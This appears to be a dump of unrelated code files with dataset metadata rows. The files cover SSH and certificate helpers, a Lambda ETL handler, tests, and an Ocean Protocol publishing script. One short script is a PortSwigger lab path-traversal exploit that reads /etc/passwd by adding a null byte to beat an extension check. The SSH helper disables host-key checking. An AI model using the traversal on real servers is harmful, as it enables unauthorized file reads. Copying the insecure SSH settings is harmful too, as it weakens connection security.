    :param bool sync: synchronous execution
    :param bool shell: execute with shell
    :param bool tty: allocate pseudo-tty
    :param tuple ssh_args: extra args inserted before the user@host target
    :param tuple command: remote command appended after the target
    :rtype: int or subprocess.Process
    :return: return code (sync) or subprocess handle (async)
    """
    if not ssh_private_key.exists():
        raise RuntimeError('SSH private key file not found at: {}'.format(
            ssh_private_key))
    # ensure file mode is set properly for the private key
    if not check_ssh_private_key_filemode(ssh_private_key):
        # warn only; the connection attempt still proceeds
        logger.warning(
            'SSH private key filemode is too permissive: {}'.format(
                ssh_private_key))
    # execute SSH command
    # NOTE(review): host-key checking is disabled and known_hosts discarded —
    # presumably because node host keys are transient; confirm.
    ssh_cmd = [
        'ssh', '-o', 'StrictHostKeyChecking=no',
        '-o', 'UserKnownHostsFile={}'.format(os.devnull),
        '-i', str(ssh_private_key), '-p', str(remote_port),
    ]
    if tty:
        # force pseudo-terminal allocation
        ssh_cmd.append('-t')
    if util.is_not_empty(ssh_args):
        ssh_cmd.extend(ssh_args)
    ssh_cmd.append('{}@{}'.format(username, remote_ip))
    if util.is_not_empty(command):
        ssh_cmd.extend(command)
    logger.info('{} node {}:{} with key {}'.format(
        'connecting to' if util.is_none_or_empty(command)
        else 'executing command on', remote_ip, remote_port, ssh_private_key))
    if sync:
        # blocking execution via the util subprocess wrapper
        return util.subprocess_with_output(ssh_cmd, shell=shell)
    else:
        # non-blocking: returns a process handle with stdout/stderr piped
        return util.subprocess_nowait_pipe_stdout(
            ssh_cmd, shell=shell, pipe_stderr=True)
def derive_private_key_pem_from_pfx(pfxfile, passphrase=None, pemfile=None):
    # type: (str, str, str) -> str
    """Derive a private key pem file from a pfx.
    :param str pfxfile: pfx file
    :param str passphrase: passphrase for pfx; prompted for if None
    :param str pemfile: path of pem file to write to; a temp file if None
    :rtype: str
    :return: path of pem file, or None if conversion failed
    """
    if pfxfile is None:
        raise ValueError('pfx file is invalid')
    if passphrase is None:
        passphrase = getpass.getpass('Enter password for PFX: ')
    if pemfile is None:
        # allocate a named temp file to receive the pem output
        tmp = tempfile.NamedTemporaryFile(mode='wb', delete=False)
        tmp.close()
        pemfile = tmp.name
    try:
        # openssl converts the pfx into an unencrypted pem
        subprocess.check_call(
            ['openssl', 'pkcs12', '-nodes', '-in', pfxfile, '-out',
             pemfile, '-password', 'pass:' + passphrase]
        )
    except Exception:
        # best-effort cleanup of the (possibly partial) output file
        out = pathlib.Path(pemfile)
        if out.exists():
            out.unlink()
        pemfile = None
    return pemfile
def derive_public_key_pem_from_pfx(pfxfile, passphrase=None, pemfile=None):
    # type: (str, str, str) -> str
    """Derive a public key pem file from a pfx.
    :param str pfxfile: pfx file
    :param str passphrase: passphrase for pfx; prompted for if None
    :param str pemfile: path of pem file to write to; a temp file if None
    :rtype: str
    :return: path of pem file, or None if conversion failed
    """
    if pfxfile is None:
        raise ValueError('pfx file is invalid')
    if passphrase is None:
        passphrase = getpass.getpass('Enter password for PFX: ')
    if pemfile is None:
        # allocate a named temp file to receive the pem output
        tmp = tempfile.NamedTemporaryFile(mode='wb', delete=False)
        tmp.close()
        pemfile = tmp.name
    try:
        # pfx -> full pem (cert + private key), then overwrite in place
        # with just the extracted public key
        subprocess.check_call(
            ['openssl', 'pkcs12', '-nodes', '-in', pfxfile, '-out',
             pemfile, '-password', 'pass:' + passphrase]
        )
        subprocess.check_call(
            ['openssl', 'rsa', '-in', pemfile, '-pubout', '-outform',
             'PEM', '-out', pemfile]
        )
    except Exception:
        # best-effort cleanup of the (possibly partial) output file
        out = pathlib.Path(pemfile)
        if out.exists():
            out.unlink()
        pemfile = None
    return pemfile
def _parse_sha1_thumbprint_openssl(output):
    # type: (str) -> str
    """Extract the SHA1 thumbprint from openssl fingerprint output.
    Expected input looks like ``SHA1 Fingerprint=AA:BB:...``; the value
    after '=' is returned lowercased with the colons removed.
    :param str output: raw openssl output to parse
    :rtype: str
    :return: sha1 thumbprint
    """
    fingerprint = util.decode_string(output).strip().split('=')[1]
    return fingerprint.replace(':', '').lower()
def get_sha1_thumbprint_pfx(pfxfile, passphrase):
    # type: (str, str) -> str
    """Get SHA1 thumbprint of PFX.
    :param str pfxfile: name of the pfx file to export
    :param str passphrase: passphrase for pfx; prompted for if None
    :rtype: str
    :return: sha1 thumbprint of pfx
    """
    if pfxfile is None:
        raise ValueError('pfxfile is invalid')
    if passphrase is None:
        passphrase = getpass.getpass('Enter password for PFX: ')
    # dump the pfx contents, then fingerprint the certificate within
    pfxdump = subprocess.check_output(
        ['openssl', 'pkcs12', '-in', pfxfile, '-nodes', '-passin',
         'pass:' + passphrase]
    )
    fingerprint_proc = subprocess.Popen(
        ['openssl', 'x509', '-noout', '-fingerprint'],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE
    )
    stdout, _ = fingerprint_proc.communicate(input=pfxdump)
    return _parse_sha1_thumbprint_openssl(stdout)
def get_sha1_thumbprint_pem(pemfile):
    # type: (str) -> str
    """Get SHA1 thumbprint of PEM.
    :param str pemfile: name of the pem file to fingerprint
    :rtype: str
    :return: sha1 thumbprint of pem
    """
    proc = subprocess.Popen(
        ['openssl', 'x509', '-noout', '-fingerprint', '-in', pemfile],
        stdout=subprocess.PIPE
    )
    stdout, _ = proc.communicate()
    return _parse_sha1_thumbprint_openssl(stdout)
def generate_pem_pfx_certificates(config):
    # type: (dict) -> str
    """Generate a pem and a derived pfx file.
    Creates a self-signed certificate with a fresh 2048-bit RSA key via
    openssl, writes the public key pem, converts the pair into a pfx
    protected by the passphrase, and always removes the intermediate
    private key material.
    :param dict config: configuration dict
    :rtype: str
    :return: sha1 thumbprint of pfx
    """
    # gather input
    pemfile = settings.batch_shipyard_encryption_public_key_pem(config)
    pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
    passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
    # prompt interactively for any value absent from the config
    if pemfile is None:
        pemfile = util.get_input('Enter public key PEM filename to create: ')
    if pfxfile is None:
        pfxfile = util.get_input('Enter PFX filename to create: ')
    if passphrase is None:
        while util.is_none_or_empty(passphrase):
            passphrase = getpass.getpass('Enter password for PFX: ')
            if len(passphrase) == 0:
                print('passphrase cannot be empty')
    privatekey = pemfile + '.key'
    # generate pem file with private key and no password
    f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
    f.close()
    try:
        # self-signed x509 cert, 730-day validity, fresh rsa:2048 key
        subprocess.check_call(
            ['openssl', 'req', '-new', '-nodes', '-x509', '-newkey',
             'rsa:2048', '-keyout', privatekey, '-out', f.name, '-days', '730',
             '-subj', '/C=US/ST=None/L=None/O=None/CN=BatchShipyard']
        )
        # extract public key from private key
        subprocess.check_call(
            ['openssl', 'rsa', '-in', privatekey, '-pubout', '-outform',
             'PEM', '-out', pemfile]
        )
        logger.debug('created public key PEM file: {}'.format(pemfile))
        # convert pem to pfx for Azure Batch service
        subprocess.check_call(
            ['openssl', 'pkcs12', '-export', '-out', pfxfile, '-inkey',
             privatekey, '-in', f.name, '-certfile', f.name,
             '-passin', 'pass:', '-passout', 'pass:' + passphrase]
        )
        logger.debug('created PFX file: {}'.format(pfxfile))
    finally:
        # remove rsa private key file
        fp = pathlib.Path(privatekey)
        if fp.exists():
            fp.unlink()
        # remove temp cert pem
        fp = pathlib.Path(f.name)
        if fp.exists():
            fp.unlink()
    # get sha1 thumbprint of pfx
    return get_sha1_thumbprint_pfx(pfxfile, passphrase)
def get_encryption_pfx_settings(config):
    # type: (dict) -> tuple
    """Get PFX encryption settings from configuration.
    :param dict config: configuration settings
    :rtype: tuple
    :return: PfxSettings(filename, passphrase, sha1)
    """
    pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
    passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
    thumbprint = settings.batch_shipyard_encryption_pfx_sha1_thumbprint(
        config)
    # compute and persist the thumbprint if the config does not carry one
    if util.is_none_or_empty(thumbprint):
        if passphrase is None:
            passphrase = getpass.getpass('Enter password for PFX: ')
        thumbprint = get_sha1_thumbprint_pfx(pfxfile, passphrase)
        settings.set_batch_shipyard_encryption_pfx_sha1_thumbprint(
            config, thumbprint)
    return PfxSettings(
        filename=pfxfile, passphrase=passphrase, sha1=thumbprint)
def _rsa_encrypt_string(data, config):
    # type: (str, dict) -> str
    """RSA encrypt a string.
    Uses the configured public key pem, deriving one from the pfx when no
    pem is configured; any derived key file is deleted before returning.
    :param str data: clear text data to encrypt
    :param dict config: configuration dict
    :rtype: str
    :return: base64-encoded cipher text
    :raises ValueError: if data is None or empty
    :raises RuntimeError: if no usable public key or openssl fails
    """
    if util.is_none_or_empty(data):
        raise ValueError('invalid data to encrypt')
    inkey = settings.batch_shipyard_encryption_public_key_pem(config)
    derived = False
    if inkey is None:
        # derive pem from pfx
        derived = True
        pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
        pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(
            config)
        inkey = derive_public_key_pem_from_pfx(pfxfile, pfx_passphrase, None)
    try:
        if inkey is None:
            # derivation above can fail and return None
            raise RuntimeError('public encryption key is invalid')
        proc = subprocess.Popen(
            ['openssl', 'rsautl', '-encrypt', '-pubin', '-inkey', inkey],
            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
        ciphertext = util.base64_encode_string(
            proc.communicate(input=util.encode_string(data))[0])
        # returncode is only valid after communicate() has completed
        if proc.returncode != 0:
            raise RuntimeError(
                'openssl encryption failed with returncode: {}'.format(
                    proc.returncode))
        return ciphertext
    finally:
        # never leave a temporarily derived public key on disk
        # NOTE(review): if derivation failed, inkey is None here and
        # pathlib.Path(None) raises TypeError — pre-existing behavior.
        if derived:
            fp = pathlib.Path(inkey)
            if fp.exists():
                fp.unlink()
def _rsa_decrypt_string_with_pfx(ciphertext, config):
    # type: (str, dict) -> str
    """RSA decrypt a string.
    :param str ciphertext: cipher text in base64
    :param dict config: configuration dict
    :rtype: str
    :return: decrypted cipher text
    :raises ValueError: if ciphertext is None or empty
    :raises RuntimeError: if the private key cannot be derived
    """
    if util.is_none_or_empty(ciphertext):
        raise ValueError('invalid ciphertext to decrypt')
    pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
    pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
    # decryption needs the private key extracted from the pfx
    pemfile = derive_private_key_pem_from_pfx(pfxfile, pfx_passphrase, None)
    if pemfile is None:
        raise RuntimeError('cannot decrypt without valid private key')
    cleartext = None
    try:
        raw = util.base64_decode_string(ciphertext)
        proc = subprocess.Popen(
            ['openssl', 'rsautl', '-decrypt', '-inkey', pemfile],
            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
        cleartext, _ = proc.communicate(input=raw)
    finally:
        # never leave the derived private key on disk
        key_path = pathlib.Path(pemfile)
        if key_path.exists():
            key_path.unlink()
    return cleartext
def encrypt_string(enabled, string, config):
    # type: (bool, str, dict) -> str
    """Encrypt a string if encryption is enabled.
    :param bool enabled: if encryption is enabled
    :param str string: string to encrypt
    :param dict config: configuration dict
    :rtype: str
    :return: encrypted string when enabled, otherwise the input unchanged
    """
    if not enabled:
        return string
    return _rsa_encrypt_string(string, config)
| 35.311547
| 79
| 0.653258
| 2,038
| 16,208
| 5.052012
| 0.185476
| 0.028166
| 0.022727
| 0.03312
| 0.41521
| 0.379856
| 0.32566
| 0.271465
| 0.221445
| 0.197358
| 0
| 0.006029
| 0.24272
| 16,208
| 458
| 80
| 35.388646
| 0.832817
| 0.296088
| 0
| 0.363636
| 0
| 0
| 0.120575
| 0.008142
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064394
| false
| 0.125
| 0.060606
| 0.003788
| 0.200758
| 0.049242
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0add5b092c6c665d2b618a20a05d4cd299d00402
| 1,948
|
py
|
Python
|
src/handler.py
|
MrIgumnov96/ETL-CloudDeployment
|
666b85a9350460fba49f82ec90f5cddc0bdd0235
|
[
"Unlicense"
] | null | null | null |
src/handler.py
|
MrIgumnov96/ETL-CloudDeployment
|
666b85a9350460fba49f82ec90f5cddc0bdd0235
|
[
"Unlicense"
] | null | null | null |
src/handler.py
|
MrIgumnov96/ETL-CloudDeployment
|
666b85a9350460fba49f82ec90f5cddc0bdd0235
|
[
"Unlicense"
] | null | null | null |
import boto3
import src.app as app
import csv
import psycopg2 as ps
import os
from dotenv import load_dotenv
# Load DB connection settings from the environment (.env via python-dotenv).
load_dotenv()
dbname = os.environ["db"]
host = os.environ["host"]
port = os.environ["port"]
user = os.environ["user"]
password = os.environ["pass"]
# Module-level connection: created once per Lambda container at import time
# and reused across invocations of handle().
connection = ps.connect(dbname=dbname,
                        host=host,
                        port=port,
                        user=user,
                        password=password)
def handle(event, context):
    """AWS Lambda entry point: on an S3 event, fetch the uploaded object
    and hand its decoded contents to the ETL app.

    :param event: S3 event notification payload
    :param context: Lambda context (unused)
    :return: dict with a status message for CloudWatch
    """
    # sanity-check the container-cached DB connection
    cursor = connection.cursor()
    cursor.execute("SELECT 1", ())
    print(cursor.fetchall())
    # Get key and bucket information from the triggering S3 record
    key = event['Records'][0]['s3']['object']['key']
    bucket = event['Records'][0]['s3']['bucket']['name']
    # use boto3 library to get object from S3
    s3 = boto3.client('s3')
    s3_object = s3.get_object(Bucket=bucket, Key=key)
    data = s3_object['Body'].read().decode('utf-8')
    # CSV parsing was moved into app.start_app; all_lines is passed through
    # (presumably populated there -- TODO confirm against src.app).
    all_lines = []
    app.start_app(all_lines, data)
    # FIX: plain loop instead of a side-effect list comprehension followed
    # by a useless expression statement.
    for line in all_lines:
        print(line)
    return {"message": "success!!! Check the cloud watch logs for this lambda in cloudwatch https://eu-west-1.console.aws.amazon.com/cloudwatch/home?region=eu-west-1#logsV2:log-groups"}
# Form all the lines of data into a list of lists
# all_lines = [line for line in csv_data]
# print(data)
# print(all_lines)
| 31.419355
| 185
| 0.587269
| 259
| 1,948
| 4.324324
| 0.42471
| 0.064286
| 0.046429
| 0.026786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017446
| 0.264374
| 1,948
| 62
| 186
| 31.419355
| 0.764131
| 0.325975
| 0
| 0
| 0
| 0.032258
| 0.186191
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0.064516
| 0.193548
| 0
| 0.258065
| 0.096774
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0af1a3c68967c05606abe6a22eb2bbc2a17f6f6f
| 1,164
|
py
|
Python
|
tests/serverless/checks/aws/test_AdminPolicyDocument.py
|
peaudecastor/checkov
|
a4804b61c1b1390b7abd44ab53285fcbc3e7e80b
|
[
"Apache-2.0"
] | null | null | null |
tests/serverless/checks/aws/test_AdminPolicyDocument.py
|
peaudecastor/checkov
|
a4804b61c1b1390b7abd44ab53285fcbc3e7e80b
|
[
"Apache-2.0"
] | null | null | null |
tests/serverless/checks/aws/test_AdminPolicyDocument.py
|
peaudecastor/checkov
|
a4804b61c1b1390b7abd44ab53285fcbc3e7e80b
|
[
"Apache-2.0"
] | null | null | null |
import os
import unittest
from checkov.serverless.checks.function.aws.AdminPolicyDocument import check
from checkov.serverless.runner import Runner
from checkov.runner_filter import RunnerFilter
class TestAdminPolicyDocument(unittest.TestCase):
    """Runs the serverless runner against the AdminPolicyDocument examples
    and verifies the pass/fail/skip summary counts."""

    def test_summary(self):
        runner = Runner()
        current_dir = os.path.dirname(os.path.realpath(__file__))
        # NOTE(review): "sneaky_var" is presumably expanded inside the
        # example templates -- confirm against example_AdminPolicyDocument.
        os.environ["sneaky_var"] = "*"
        test_files_dir = current_dir + "/example_AdminPolicyDocument"
        report = runner.run(
            root_folder=test_files_dir,
            runner_filter=RunnerFilter(checks=[check.id]))
        summary = report.get_summary()
        expectations = (
            ('passed', 2, report.passed_checks, 'Passed'),
            ('failed', 6, report.failed_checks, 'Failed'),
            ('skipped', 0, report.skipped_checks, 'Skipped'),
        )
        for key, expected, checks, label in expectations:
            self.assertEqual(
                summary[key], expected,
                f"{label} checks: {[fc.file_path for fc in checks]}")
        self.assertEqual(summary['parsing_errors'], 0)
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
| 36.375
| 102
| 0.668385
| 137
| 1,164
| 5.445255
| 0.40146
| 0.080429
| 0.117962
| 0.064343
| 0.116622
| 0.116622
| 0.116622
| 0.116622
| 0
| 0
| 0
| 0.00441
| 0.22079
| 1,164
| 31
| 103
| 37.548387
| 0.818082
| 0.006014
| 0
| 0
| 0
| 0
| 0.232035
| 0.082251
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.045455
| false
| 0.090909
| 0.227273
| 0
| 0.318182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
e40c283a7830ae526fea47bfe3f1719fdb809be3
| 358
|
py
|
Python
|
directory-traversal/validate-file-extension-null-byte-bypass.py
|
brandonaltermatt/penetration-testing-scripts
|
433b5d000a5573e60b9d8e49932cedce74937ebc
|
[
"MIT"
] | null | null | null |
directory-traversal/validate-file-extension-null-byte-bypass.py
|
brandonaltermatt/penetration-testing-scripts
|
433b5d000a5573e60b9d8e49932cedce74937ebc
|
[
"MIT"
] | null | null | null |
directory-traversal/validate-file-extension-null-byte-bypass.py
|
brandonaltermatt/penetration-testing-scripts
|
433b5d000a5573e60b9d8e49932cedce74937ebc
|
[
"MIT"
] | null | null | null |
"""
https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass

Fetch /etc/passwd from a PortSwigger lab instance (argv[1]) via a path
traversal filename with a %00 null-byte extension-validation bypass.
"""
import sys
import requests

site = sys.argv[1]
# FIX: the original used site.lstrip('https://'), but str.lstrip strips a
# CHARACTER SET, not a prefix -- it would also eat leading h/t/p/s/:/ chars
# from the hostname itself (e.g. 'https://super.com' -> 'uper.com').
# Slice the scheme prefix off instead.
if site.startswith('https://'):
    site = site.rstrip('/')[len('https://'):]
url = f'''https://{site}/image?filename=../../../etc/passwd%00.png'''
s = requests.Session()
resp = s.get(url)
print(resp.text)
| 21.058824
| 101
| 0.664804
| 52
| 358
| 4.576923
| 0.730769
| 0.067227
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009288
| 0.097765
| 358
| 17
| 102
| 21.058824
| 0.727554
| 0.282123
| 0
| 0
| 0
| 0
| 0.292
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.111111
| 0.222222
| 0
| 0.222222
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7c3522929deb4bb2524b97c1af2b5f08df9a050e
| 5,585
|
py
|
Python
|
backend/0_publish_audio.py
|
bmj-hackathon/ethberlinzwei-babelfish_3_0
|
e986ad1b9fa896f20d7cdd296d130d804f55ecfa
|
[
"Apache-2.0"
] | 1
|
2019-08-28T12:12:09.000Z
|
2019-08-28T12:12:09.000Z
|
backend/0_publish_audio.py
|
bmj-hackathon/ethberlinzwei-babelfish_3_0
|
e986ad1b9fa896f20d7cdd296d130d804f55ecfa
|
[
"Apache-2.0"
] | 8
|
2020-09-07T01:00:44.000Z
|
2022-03-02T05:19:32.000Z
|
backend/0_publish_audio.py
|
bmj-hackathon/ethberlinzwei-babelfish_3_0
|
e986ad1b9fa896f20d7cdd296d130d804f55ecfa
|
[
"Apache-2.0"
] | 3
|
2019-08-24T20:36:08.000Z
|
2021-02-18T20:28:11.000Z
|
import sys
import logging

#%%
# Standard imports
import os
from pathlib import Path
import json
from time import sleep
# Ocean imports
import squid_py
from squid_py.ocean.ocean import Ocean
from squid_py.config import Config
from pprint import pprint
import mantaray_utilities as manta_utils
from mantaray_utilities.user import password_map

#%% CONFIG
# Resolve the config/password/template files that must live next to this
# script, and export the paths the squid/mantaray stack reads from env vars.
OCEAN_CONFIG_PATH = Path().cwd() / 'config_nile.ini'
assert OCEAN_CONFIG_PATH.exists(), "{} - path does not exist".format(OCEAN_CONFIG_PATH)
os.environ['OCEAN_CONFIG_PATH'] = str(OCEAN_CONFIG_PATH)

PASSWORD_PATH = Path().cwd() / ".nile_passwords"
assert PASSWORD_PATH.exists()
os.environ["PASSWORD_PATH"] = str(PASSWORD_PATH)

MARKET_PLACE_PROVIDER_ADDRESS = "0x376817c638d2a04f475a73af37f7b51a2862d567"
os.environ["MARKET_PLACE_PROVIDER_ADDRESS"] = MARKET_PLACE_PROVIDER_ADDRESS

JSON_TEMPLATE = Path().cwd() / 'metadata_template.json'
assert JSON_TEMPLATE.exists()

#%% ARGPARSE
import argparse
parser = argparse.ArgumentParser(description='Publish audio')
parser.add_argument('--url', type=str, help='URL for input audio file')
parser.add_argument('--price', type=int, help='Selling price in Ocean token')
parser.add_argument('--reward', type=int, help='Reward offered in Ocean token')
parser.add_argument('--number-nodes', type=int, help='Number of processor nodes requested')
args = parser.parse_args()

# Banner.  The original called .format() with no arguments on every constant
# string below; that is a no-op, so those calls are removed.
logging.info("************************************************************")
logging.info("*** ETHBERLINZWEI HACKATHON ***")
logging.info("*** SPEECH2TEXT ***")
logging.info("*** STEP 1 - CLIENT REGISTERS A CLIP INTO OCEAN PROTOCOL ***")
logging.info("************************************************************")
logging.info("")
logging.info("(Step 1.1 not implemented - upload audio file from client to storage)")
logging.info("Publishing Audio to NILE network: {}".format(args.url))
logging.info("Will set price to {} OCEAN".format(args.price))
logging.info("Offering {} OCEAN reward".format(args.reward))
logging.info("Requesting {} processors".format(args.number_nodes))
logging.info("")

#%%
# Get the configuration file path for this environment
logging.info("Configuration file selected: {}".format(OCEAN_CONFIG_PATH))
logging.info("Squid API version: {}".format(squid_py.__version__))

#%%
# Instantiate Ocean with the default configuration file.
configuration = Config(OCEAN_CONFIG_PATH)
squid_py.ConfigProvider.set_config(configuration)
ocn = Ocean(configuration)

#%%
# Get a publisher account (the first account known to this node).
publisher_acct = manta_utils.user.get_account_by_index(ocn, 0)

#%%
logging.info("Publisher account address: {}".format(publisher_acct.address))
logging.info("Publisher account Testnet 'ETH' balance: {:>6.1f}".format(ocn.accounts.balance(publisher_acct).eth/10**18))
logging.info("Publisher account Testnet Ocean balance: {:>6.1f}".format(ocn.accounts.balance(publisher_acct).ocn/10**18))
def publish(url, price, reward, number_nodes):
    """Register an audio asset on Ocean Protocol and return its DID.

    Loads the module-level JSON metadata template, fills in the url, price,
    reward and requested node count (all stored as strings by the template's
    convention), then registers the asset via the module-level ``ocn``
    instance under ``publisher_acct``.
    """
    with open(JSON_TEMPLATE, 'r') as template_file:
        asset_metadata = json.load(template_file)

    asset_metadata['base']['files'][0]['url'] = url
    asset_metadata['base']['price'] = str(price)
    asset_metadata['additionalInformation']['reward'] = str(reward)
    asset_metadata['additionalInformation']['numberNodes'] = str(number_nodes)

    new_ddo = ocn.assets.create(asset_metadata, publisher_acct)
    did = new_ddo.did
    logging.info("New asset registered at {}".format(str(did)))
    logging.info("Asset name: {}".format(asset_metadata['base']['name']))
    logging.info("Encrypted files to secret store, cipher text: [{}...] . ".format(new_ddo.metadata['base']['encryptedFiles'][:50]))
    return did
registered_did = publish(args.url, args.price, args.reward, args.number_nodes)

# TODO: Better handling based on receipt
print("Wait for the transaction to complete!")
sleep(10)

# %%
# Resolve the freshly registered DID back from Aquarius metadata storage.
ddo = ocn.assets.resolve(registered_did)

# %% [markdown]
# Similarly, we can verify that this asset is registered into the blockchain, and that you are the owner.

# %%
# We need the pure ID string as in the DID registry (a DID without the prefixes)
asset_id = squid_py.did.did_to_id(registered_did)
owner = ocn._keeper.did_registry.contract_concise.getDIDOwner(asset_id)

# Case-insensitive compare: on-chain addresses may differ only in hex casing.
assert owner.lower() == publisher_acct.address.lower()

logging.info("")
logging.info("Successfully registered Audio!")
logging.info("Asset Owner: {}".format(owner))
logging.info("Asset DID: {}".format(registered_did))
| 36.986755
| 128
| 0.708684
| 721
| 5,585
| 5.363384
| 0.306519
| 0.06827
| 0.039566
| 0.024825
| 0.138092
| 0.088699
| 0.049651
| 0.049651
| 0.03129
| 0
| 0
| 0.012566
| 0.116562
| 5,585
| 150
| 129
| 37.233333
| 0.77118
| 0.253715
| 0
| 0.067568
| 0
| 0
| 0.315175
| 0.062014
| 0
| 0
| 0.010214
| 0.006667
| 0.054054
| 1
| 0.013514
| false
| 0.054054
| 0.175676
| 0
| 0.202703
| 0.027027
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7c70c6e774d6a8ca53417d3cc9999e257be28aad
| 1,093
|
py
|
Python
|
test/test_pipeline/components/classification/test_passive_aggressive.py
|
vardaan-raj/auto-sklearn
|
4597152e3a60cd6f6e32719a3bef26e13951b102
|
[
"BSD-3-Clause"
] | 1
|
2021-02-21T16:44:44.000Z
|
2021-02-21T16:44:44.000Z
|
test/test_pipeline/components/classification/test_passive_aggressive.py
|
vardaan-raj/auto-sklearn
|
4597152e3a60cd6f6e32719a3bef26e13951b102
|
[
"BSD-3-Clause"
] | 9
|
2021-02-12T17:52:34.000Z
|
2021-06-26T11:37:41.000Z
|
test/test_pipeline/components/classification/test_passive_aggressive.py
|
vardaan-raj/auto-sklearn
|
4597152e3a60cd6f6e32719a3bef26e13951b102
|
[
"BSD-3-Clause"
] | 1
|
2021-07-06T23:02:42.000Z
|
2021-07-06T23:02:42.000Z
|
import sklearn.linear_model
from autosklearn.pipeline.components.classification.passive_aggressive import \
PassiveAggressive
from .test_base import BaseClassificationComponentTest
class PassiveAggressiveComponentTest(BaseClassificationComponentTest):
    """Component test for the PassiveAggressive classifier wrapper.

    Only the expected-results table and the wrapped sklearn/autosklearn
    classes differ from the shared base test; all test logic lives in
    ``BaseClassificationComponentTest``.
    """

    __test__ = True

    # Expected scores / call counts per benchmark dataset, keyed as the
    # base test expects them.
    res = {
        "default_iris": 0.92,
        "iris_n_calls": 5,
        "default_iris_iterative": 0.92,
        "iris_iterative_n_iter": 32,
        "default_iris_proba": 0.29271032477461295,
        "default_iris_sparse": 0.4,
        "default_digits": 0.9156041287188829,
        "digits_n_calls": 6,
        "default_digits_iterative": 0.9156041287188829,
        "digits_iterative_n_iter": 64,
        "default_digits_binary": 0.9927140255009107,
        "default_digits_multilabel": 0.90997912489192,
        "default_digits_multilabel_proba": 1.0,
        'ignore_hps': ['max_iter'],
    }

    sk_mod = sklearn.linear_model.PassiveAggressiveClassifier
    module = PassiveAggressive
    step_hyperparameter = {
        'name': 'max_iter',
        'value': module.get_max_iter(),
    }
| 30.361111
| 79
| 0.725526
| 123
| 1,093
| 6.105691
| 0.447154
| 0.11984
| 0.106525
| 0.026631
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10989
| 0.167429
| 1,093
| 35
| 80
| 31.228571
| 0.715385
| 0
| 0
| 0
| 0
| 0
| 0.26624
| 0.15279
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.185185
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7c9666a6d0704c6c5a1d15ed10e9ce79d7670676
| 3,215
|
py
|
Python
|
project/server/models.py
|
mvlima/flask-jwt-auth
|
6cb210b50888b1e9a41ea9e63a80eafcbe436560
|
[
"MIT"
] | null | null | null |
project/server/models.py
|
mvlima/flask-jwt-auth
|
6cb210b50888b1e9a41ea9e63a80eafcbe436560
|
[
"MIT"
] | null | null | null |
project/server/models.py
|
mvlima/flask-jwt-auth
|
6cb210b50888b1e9a41ea9e63a80eafcbe436560
|
[
"MIT"
] | null | null | null |
# project/server/models.py
import jwt
import datetime
from project.server import app, db, bcrypt
class User(db.Model):
    """ User Model for storing user related details """
    __tablename__ = "users"

    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    username = db.Column(db.String(255), unique=True, nullable=False)
    email = db.Column(db.String(255), unique=True, nullable=False)
    # bcrypt hash, never the plaintext password.
    password = db.Column(db.String(255), nullable=False)
    name = db.Column(db.String(255), nullable=False)
    age = db.Column(db.Integer, nullable=False)
    # BUG FIX: was db.Integer(255).  SQLAlchemy's Integer type takes no
    # length argument, so the original raised TypeError at import time.
    # An address is free text, so String(255) is the intended column type.
    address = db.Column(db.String(255), nullable=False)
    registered_on = db.Column(db.DateTime, nullable=False)
